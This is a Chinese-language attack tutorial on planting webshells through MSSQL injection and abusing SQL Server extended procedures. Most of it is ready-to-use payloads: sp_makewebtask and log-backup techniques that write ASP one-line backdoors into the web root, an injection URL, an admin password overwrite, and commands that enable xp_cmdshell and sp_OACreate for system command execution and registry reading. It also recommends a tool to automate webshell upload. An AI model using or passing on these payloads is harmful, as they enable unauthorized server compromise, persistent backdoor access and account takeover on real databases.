MSSQL之上马与组件扩展

Mssql上马

1. 利用sp_makewebtask写入一句话木马

1 . 修复上传

;exec sp_makewebtask 'c:\inetpub\wwwroot\x.asp','select''%3C%25%65%76%61%6C%20%72%65%71%75%65%73%74%28%22%63%68%6F%70%70%65%72%22%29%25%3E'''--

;exec sp_configure ‘Web Assistant Procedures’, 1; RECONFIGURE

代码讲解：实际上是用sp_makewebtask这个任务来把这个一句话保存在自己定义的目录下，生成了个x1.asp 文件，这个文件这里一般都是asp结尾的，而且这里是编码过得，要看的话可以解码来看

http://mssql.sql.com/aspx.aspx？id=1%20;exec%20sp_makewebtask%20%20%27c:\inetpub\wwwroot\ms\x1.asp%27,%27select%27%27<%execute(request("cmd"))%>%27%27%27--

这样就证明一句话写进去了，这样会在你定义的那个目录里面生成了个.asp文件，然后用菜刀去连接着一句话就行了。

2. 修改管理员密码（日站谨慎操作，实验千万条，安全第一条。操作不规范,亲人两行泪！！）

   update admin set password=123123 where username=‘admin’;

2. dbowner权限下写一句话

• 第一步：;alter database ssdown5 set RECOVERY FULL

  //先将数据库改成recovery full 的模式

• 第二步：;create table test(str image)--

  //然后再创建一个表

• 第三步：;backup log ssdown5 to disk=‘c:\test’ with init--

  ///然后备份一下

• 第四步：;insert into test(str)values (’<%excute(request(“cmd”))%>’)--

  //插入一句话到表里面

• 第五步：;backup log ssdown5 to disk=‘c:\inetpub\wwwroot\ x.asp’--

  //然后就备份到网站的根目录生成一个 x.asp的文件。

• 第六步：;alter database ssdown5 set RECOVERY simple

  //最后将数据库改成recovery simple的模式

其实有工具可以使用：GetWebShell增强版 （操作如下）

1、注入地址就是目标地址；

2、插入代码就是一句话

3、备份路径就是网页的根目录，生成了个asp文件

4、这里可以一步一步来点，也可以一键备份全搞定，都一样。

组件扩展

堆叠注入下的扩展运用

• xp_cmdshell //命令执行，高版本默认关闭，但可以打开

  • Exec sp_configure ‘show advanced options’,1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’,1;RECONFIGURE;

  • Exec master.dbo.xp_cmdshell ‘whoami’;

• sp_OACreate //命令执行，文件操作，无回显

  • EXEC sp_configure ‘show advanced options’, 1;

  • RECONFIGURE WITH OVERRIDE;

  • EXEC sp_configure ‘Ole Automation Procedures’, 1;

  • RECONFIGURE WITH OVERRIDE;

  • EXEC sp_configure ‘show advanced options’, 0;

  • declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,‘run’,null,‘c:\windows\system32\cmd.exe /c whoami >D:\\1.txt’;

• xp_dirtree和xp_subdirs //列文件，xp_fileexist 确定文件是否存在

  • execute master…xp_dirtree ‘c:’,1,1

  • execute master…xp_subdirs ‘c:’

  • execute master…xp_fileexist ‘D:\test.txt’

• xp_regenumvalues，xp_regread ，xp_regwrite， xp_regdeletevalue，xp_regdeletekey //注册表操作。

  • exec xp_regenumvalues’HKEY_LOCAL_MACHINE’,‘SOFTWARE\Microsoft\Windows\CurrentVersion\Run’

  • EXEC master…xp_regenumvalues ‘HKEY_CURRENT_USER’,‘Control Panel\International’,‘sCountry’;

• sp_helpextendedproc //查看全部扩展

  • EXEC master…sp_helpextendedproc

• xp_availablemedia //查看驱动器

  • exec master…xp_availablemedia

• sp_who2 //查看登录账户

  • EXEC master…sp_who2